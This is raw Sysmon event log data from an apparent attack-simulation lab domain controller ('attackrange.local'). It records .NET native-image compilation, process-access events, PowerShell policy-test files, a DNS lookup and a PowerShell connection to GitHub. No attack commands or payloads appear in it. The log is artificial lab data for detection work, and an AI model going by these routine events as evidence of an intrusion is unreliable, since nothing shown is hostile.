21:07:17.045{4DB9351A-A285-60D3-D605-00000000CF01}7068NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\AMATZLF9SM\System.IO.Compression.ni.dll.auxMD5=C2A7DDD48D8E56613E74337BCA64A3E8,SHA256=C042ED5270BAF499877FE42359AA94805580249DF22DAC8CEDCAB93904B7E45F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023659Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.045{4DB9351A-A285-60D3-D605-00000000CF01}7068NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\AMATZLF9SM\System.IO.Compression.ni.dllMD5=7A384D0944291F6F238DEE095A980C83,SHA256=A5E470743FF15E7738CD0E254E45EE379085ABB5CD0E44C24044A2BD1A48933C,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023658Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.014{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A285-60D3-D605-00000000CF01}7068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023657Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.998{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A285-60D3-D605-00000000CF01}7068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023656Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.998{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A285-60D3-D605-00000000CF01}7068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023655Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.998{4DB9351A-A284-60D3-D505-00000000CF01}7056NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NKG3FY72MM\System.IdentityModel.Services.ni.dll.auxMD5=352804A1AA668BACA6C350485DE2480C,SHA256=795C416DAB03D96158E4EB003D8C437BBEE36C056243A8F402360F960975F762,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023654Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.998{4DB9351A-A284-60D3-D505-00000000CF01}7056NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NKG3FY72MM\System.IdentityModel.Services.ni.dllMD5=E3675B67243FE8ED3B4E6F8AA4048047,SHA256=689570A5684CE9DAF573097EB4FF8A66E1F598200422031391DF61A2A3E78E01,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023708Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:18.905{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D7D6A5B59AC52A6F350E8DB2BE45EBC,SHA256=DE58B745FFC95E777A126D59F198BA495E73F23E8645E98716AA12777A3FBFA1,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000023707Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.762{4DB9351A-A273-60D3-3C05-00000000CF01}6608onegetcdn.azureedge.net0type: 5 onegetcdn.ec.azureedge.net;type: 5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000023706Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:18.717{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_10nsze4l.ukd.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023705Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:18.717{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_almu3xay.crr.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000023704Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:18.717{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_almu3xay.crr.ps12021-06-23 21:07:18.717 354300x800000000000000023703Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.147{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local54235- 354300x800000000000000023702Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.255{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61465-false192.30.255.120lb-192-30-255-120-sea.github.com443https 10341000x800000000000000023784Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.983{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A287-60D3-E805-00000000CF01}6228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023783Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.967{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A287-60D3-E805-00000000CF01}6228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023782Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.967{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A287-60D3-E805-00000000CF01}6228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023781Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.967{4DB9351A-A287-60D3-E705-00000000CF01}4896NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\Z7I5LS7U94\System.ServiceModel.Activities.ni.dll.auxMD5=CD0A73D14AB13CA6FDA89BA029F799AC,SHA256=3AAF99141D109EDE06B294926186B09805B08561B12350C0389301B947F1F706,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023780Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.951{4DB9351A-A287-60D3-E705-00000000CF01}4896NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\Z7I5LS7U94\System.ServiceModel.Activities.ni.dllMD5=FFE7A44D60DB0D1089C1B9EC2F8B1F12,SHA256=EE9BDBCF805E7A2E81B775D486326649A8A041183AA86F5BE49FDFF3B05DA4A1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023779Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.936{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F955BC4DE9AD00FA0319611AC0B33AA,SHA256=07633DCEF74E973AA9A9E710E022F464A3C9EC4F7F9DF2CF6EFD2EAA03E9002D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023778Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.826{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A287-60D3-E705-00000000CF01}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023777Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.811{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A287-60D3-E705-00000000CF01}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023776Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.811{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A287-60D3-E705-00000000CF01}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023775Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.811{4DB9351A-A287-60D3-E605-00000000CF01}3112NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2LOT1M111P\System.ServiceModel.Activation.ni.dll.auxMD5=56A2B3BCA19E2D6C50EC7D37946C770E,SHA256=27105769178B50AE214F188D76B97D7DAF96FFDFC69848DCFC3B98882596FBB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023774Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.811{4DB9351A-A287-60D3-E605-00000000CF01}3112NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2LOT1M111P\System.ServiceModel.Activation.ni.dllMD5=6C64A1F26FE4083FB9DCA34597DDF31D,SHA256=F208B7658ECAD22C60AC6BA8E321AAEFDC2477548D8E368C95D53A5D3E4FCA8E,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023773Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.780{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A287-60D3-E605-00000000CF01}3112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023772Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.764{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A287-60D3-E605-00000000CF01}3112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023771Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.764{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A287-60D3-E605-00000000CF01}3112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023770Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.764{4DB9351A-A287-60D3-E505-00000000CF01}5328NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RSKVFY6D4I\System.Security.ni.dll.auxMD5=BCF9C6CBAB507C2C1C30C9E5A85987F6,SHA256=AFBC6EAFBF5366A8E7CD89CDD7A3720A3EEB73593249590D3258CA122390FB74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023769Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.764{4DB9351A-A287-60D3-E505-00000000CF01}5328NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RSKVFY6D4I\System.Security.ni.dllMD5=8710EF06922A419ACB11F0872027DCA7,SHA256=650049C79B641BF1CC77092CC07EA3B9323C3A4ACAE017FD78A653AC879C5F1C,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023768Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.701{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A287-60D3-E505-00000000CF01}5328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023767Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.686{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A287-60D3-E505-00000000CF01}5328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023766Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.686{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A287-60D3-E505-00000000CF01}5328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023765Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.686{4DB9351A-A287-60D3-E405-00000000CF01}6484NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KFRAJX6IT0\System.Runtime.Serialization.Formatters.Soap.ni.dll.auxMD5=5EB3FD63AA89C8CCBA01C1849AEFCEFA,SHA256=B0430ECBCC998ED192A1428AAF5C30494258AE66A8E3F9DFDCC98A49F45A83DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023764Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.686{4DB9351A-A287-60D3-E405-00000000CF01}6484NT 